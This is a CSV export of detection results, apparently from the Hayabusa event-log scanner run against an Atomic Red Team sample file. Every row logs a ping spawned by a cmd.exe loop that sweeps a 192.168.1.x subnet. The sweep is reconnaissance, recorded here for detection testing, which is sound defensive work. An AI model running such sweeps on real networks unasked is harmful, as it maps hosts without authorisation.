+2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.29  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.30  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.31  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.32  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.33  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.34  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.35  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.36  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.37  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.38  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.39  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.40  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.41  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.42  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.43  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.44  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.45  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.46  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.47  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.48  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.49  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.50  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.51  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.52  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.53  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.54  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.55  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.56  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.57  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.58  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.59  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.60  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.61  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.62  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.63  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.64  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.65  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.66  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.67  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.68  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.69  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.70  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.71  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.72  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.73  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.74  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.75  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.76  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.77  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.78  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.79  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.80  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.81  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.82  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
